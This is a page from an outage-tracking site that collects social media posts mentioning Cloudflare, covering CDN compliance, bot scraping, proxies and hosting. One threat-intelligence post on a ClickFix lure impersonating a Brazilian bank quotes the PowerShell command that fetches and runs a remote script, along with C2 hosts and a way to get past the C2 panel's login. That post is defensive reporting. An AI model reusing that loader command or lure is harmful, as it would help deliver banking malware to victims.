Cloudflare Outage Map

Community Discussion

Tips? Frustrations? Share them here. Useful comments include a description of the problem, city and postal code.

Beware of "support numbers" or "recovery" accounts that might be posted below. Make sure to report and downvote those comments. Avoid posting your personal information.

Cloudflare Issues Reports

Latest outage, problems and issue reports in social media:

• 
  Tobias Brida (@TobiasBrida) reported 3 minutes ago

  Quick, calm down — the DSB is probably not going to fine you for using Cloudflare, despite what the loud privacy alarmists want you to believe. Contrary to popular opinion, using a reputable CDN is not a compliance death sentence. Developing cool local tech is a nice cause, but it would be quite nice if it could be achieved without vibe-coded sites that tell you how likely you are to get sued

• 
  𝗶𝗮𝗺𝟰𝘅 (🌷,🦈) (@iam4x) reported 4 minutes ago

  @DegenCT @TheCryptoNexus - Proxy the ui api of hyperliquid through cloudflare to fetch sub-accounts - Then implementing the spot trading with support of sub-accounts

• 
  Deborah (@DeborahHat96840) reported 8 minutes ago

  **It's a red flag for self-dealing and questionable valuation in a no-revenue microcap.** In standard U.S. GAAP (especially for OTC companies under Alternative Reporting), a parent like **Hop-on Inc. ($HPNN)** can record an "Investment in Subsidiary" (here, ~$6.5M–$6.7M in Digitalage) on its balance sheet. For a *wholly-owned* subsidiary, full consolidation is typically required under ASC 810—line-by-line assets, liabilities, revenues, and expenses of the sub flow into the parent's statements (with eliminations for intercompany items). Treating it as a non-consolidated "investment" (often at cost or equity method) while claiming it as a subsidiary raises issues: - **Funding source via officer accruals**: Critics (and forum analyses of the Q1 2026 filing) note the asset largely stems from converted unpaid officer compensation/ obligations (primarily to CEO Peter Michaels) rather than cash infusions, external equity/debt, or operations. No cash changed hands for the bulk of the valuation. This creates a circular, related-party dynamic: the same person approves salary accruals, converts them into equity/value in a private entity he controls, and books it as a major asset for the public shell. - **Valuation support**: With HPNN showing $1,187 cash, $0 revenue, ongoing net losses (~$172k in Q1 alone), and a massive accumulated deficit (~$32.8M), there's no independent appraisal, arm's-length investment, or revenue/traction evidence disclosed to back a $6.5M+ carrying value. Digitalage itself has no separate audited financials visible in public disclosures and operates on minimal infrastructure (e.g., Cloudflare free tier per skeptics). - **Disclosure and governance gaps**: Related-party transactions (loans, accruals, conversions) must be disclosed in detail under OTC/SEC rules. Undisclosed or opaque funding for operations (while paying ~$82.5k in officer comp in Q1) can constitute material omissions. The company's governance portal and filings emphasize Digitalage as wholly-owned, yet keep it non-consolidated to avoid exposing internals. This pattern—accruing high officer pay in a dormant shell, converting to "investment" equity in a private vehicle, and promoting the sub aggressively—is common in long-deficit OTC stories. It lets the officer extract value/liability relief while public shareholders bear dilution risk, judgment exposure (e.g., recent Woolen case not fully reflected), and zero operational upside if consolidation never materializes meaningfully. **Bottom line**: It's "well" within the realm of aggressive OTC accounting that prioritizes narrative over verifiable economics. Investors should demand full consolidation details, independent valuation, and related-party footnotes in future filings. High risk of overstatement; DYOR and treat as speculative. NFA. Grok 4:53 a.m. CT 20260616

• 
  Ayushman Mallick (@AyushmanMallick) reported 8 minutes ago

  5/ You hand over a paid API key, so it's security-reviewed. The key goes only over HTTPS, only in a header, to one stateless @Cloudflare proxy that never stores it. XSS and SSRF hardened. Templates use a strongly-consistent Durable Object. The proxy is fully open-source.

• 
  special k | CEO of stressed out era (@specialkdelslay) reported 10 minutes ago

  @DispairSoftware @DataDeLaurier No no, I am showing the IPs of the ones hitting our site. They belong to openai (afaik). Cloudflare has helped with some of the bot activity but not all of it. I think they make the assumption that openai, claud, et al are good actors who will honor txt directives, when I can see for sure they are not. What he was telling me is to tunnel connections thru cloudflare and host privately but those things wouldn't mitigate this particular issue

• 
  Corey Quinn (@QuinnyPig) reported 12 minutes ago

  @KhalidWarsa @Cloudflare The trick is to actually be a customer of the things you shitpost about, otherwise it's just noise.

• 
  Malte Landwehr (@MalteLandwehr) reported 12 minutes ago

  @EddCoates So many solutions: · Cloudflare/CDN · Caching · Free API without authentication I once worked for a website with 90% bot traffic. This issue is manageable.

• 
  primitive.host (@PrimitiveHost) reported 17 minutes ago

  Anyone else using @Cloudflare "Email Address Obfuscation" feature having crawl issues on @ahrefs crawler? It detected /cdn-cgi/l/email-protection on ALL my pages and ate up my entire crawl limit for the month 😶

• 
  Josh W (@ItsWelford) reported 19 minutes ago

  @Cloudflare cc: @dillon_mulroy do you know anyone that can help me with this?

• 
  Your Private Proxy (@YourPrivateProx) reported 20 minutes ago

  Cloudflare Turnstile has five render modes: vanilla widget, Stimulus attribute, shadow DOM, inline script, programmatic. A solver built for one fails silently on the others. Same service, works on site A, 0% on site B.

• 
  DFIR Radar (@DFIR_Radar) reported 23 minutes ago

  AI-generated ClickFix lure impersonates a Brazilian 🇧🇷 bank to drop SmartRAT, a PowerShell banking RAT with QR-swap, keylogging, and fake overlay capabilities. The C2 panel had no server-side auth. Key findings: - Full infection chain: typosquatting domain cartaobb[.]com mimics cartaobrb[.]com[.]br, fake Cloudflare CAPTCHA triggers clipboard injection, fake BSOD locks the browser, then victim pastes: powershell "$k8='hxxp://64[.]95[.]13[.]238/st.txt';iex(irm $k8)" into Run. Three-stage PowerShell dropper pulls payload[.]php, AES-CBC decrypts SmartRAT in memory. Hashes: st.txt 297eb45f028d44d750297d2f932b9c91, RAT b17ccdb5531555e43f082d6e77c07227. - SmartRAT (SMART_V25) persists as scheduled task or Windows service named MicrosoftEdgeUpdateCore (T1543.003), copies itself to %APPDATA%\Microsoft\Diagnosis\ETW\msedgeupdate.txt, logs all activity to C:\ProgramData\Microsoft\Diagnosis\ETW\client_debug.log and per-PID logs. - C2 at c[.]windowsupdate-cdn[.]com port 51888 (fallback 162[.]141[.]111[.]227), AES-CBC encrypted over raw TCP. QR-swap feature overlays attacker QR at exact pixel coordinates of the legitimate banking QR to redirect transactions. Monitors window titles for santander, bradesco, itau, nubank, binance, and a dozen more. - The C2 panel (branded MyGood PRO) bypasses auth by checking only localStorage values authToken and currentUser client-side with no server validation, exposing the full admin panel to anyone who sets those keys. #DFIR_Radar

• 
  Nick Sunny (@suny_nick) reported 24 minutes ago

  @EddCoates I had similar issues. If you use Cloudflare, you can do what I did

• 
  Coffee and Gun Oil (@coffee_oil) reported 24 minutes ago

  @ShamashAran I was on cloudflare ******* with DNS last night. I hate DNS The **** I run locally works fine, but that's because it's me and a text file.

• 
  Ozgur Ozer (@ozgrozer) reported 26 minutes ago

  Today I decided to archive some of my failed projects. I never made money from them so it's time to let them go. I spent more than a year and some money on these 5 failed projects but still it's not a lose. I learned a lot about idea validation. I started my indie hacker journey 2 years ago with Next AI Tool directory. I scraped the internet so the site wouldn't look empty. There were 46k AI tools in the website on launch but a couple of weeks later Google blocked the domain on the search results lol. I made my first internet dollar with AI Renamer so it teached me lots of things about making a useful product, educating and supporting customers, marketing etc. It made $7k in the last year and still making a little so I'll keep it. Now my focus is on Grape, the AI note taking app. I only made one post on Reddit about the beta version of desktop app and since then it made 5 lifetime sales and currently has 1 active subscription. Now working on the mobile app. The failed projects, they were on my VPS using the CPU and memory. I removed their auth and dashboards to only keep their landing pages. That way I turned them into static sites and moved them from my VPS to Cloudflare Pages to host free. I'll still renew the domains because I still want to see them in the future. I can fail again but always will be learning from my mistakes and keep building until I make it.

• 
  Andrej Ruckij (@ruckiand) reported 32 minutes ago

  Online stores are panicking that AI bots are crawling their site and "stealing" their catalog. So they hit the one-click Cloudflare toggle and block everything. Most are solving the wrong problem — and quietly hurting themselves. 🧵